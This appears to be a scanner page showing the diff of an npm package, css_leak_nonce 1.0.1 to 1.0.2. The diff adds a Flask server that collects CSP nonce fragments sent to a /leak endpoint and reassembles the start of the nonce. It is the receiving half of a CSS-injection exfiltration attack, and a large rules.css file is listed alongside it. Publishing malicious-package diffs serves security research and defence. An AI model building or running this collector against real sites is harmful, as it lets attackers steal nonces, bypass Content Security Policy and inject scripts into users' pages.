css_leak_nonce 1.0.1 → 1.0.2
Sign up to get free protection for your applications and to get access to all the features.
- package/a.py +1 -1
- package/a.txt +1 -0
- package/package.json +1 -1
- package/rules.css +46656 -46656
- package/server.py +30 -0
package/server.py
ADDED
@@ -0,0 +1,30 @@
|
|
1
|
+
from flask import Flask, request
|
2
|
+
|
3
|
+
app = Flask(__name__)
|
4
|
+
|
5
|
+
leaks = []
|
6
|
+
|
7
|
+
@app.route("/leak")
|
8
|
+
def leak():
|
9
|
+
global leaks
|
10
|
+
if request.args.get("x"):
|
11
|
+
leaks.append(request.args.get("x"))
|
12
|
+
return "OK"
|
13
|
+
@app.route("/recover_nonce")
|
14
|
+
def recover():
|
15
|
+
the_start = ""
|
16
|
+
if len(leaks):
|
17
|
+
for part in leaks:
|
18
|
+
is_start = True
|
19
|
+
for substr in leaks:
|
20
|
+
if part != substr and part[0:2] in substr:
|
21
|
+
is_start = False
|
22
|
+
if is_start:
|
23
|
+
the_start = part
|
24
|
+
break
|
25
|
+
if the_start:
|
26
|
+
return f"start of nonce is {the_start}"
|
27
|
+
|
28
|
+
|
29
|
+
|
30
|
+
app.run("0.0.0.0", 3000)
|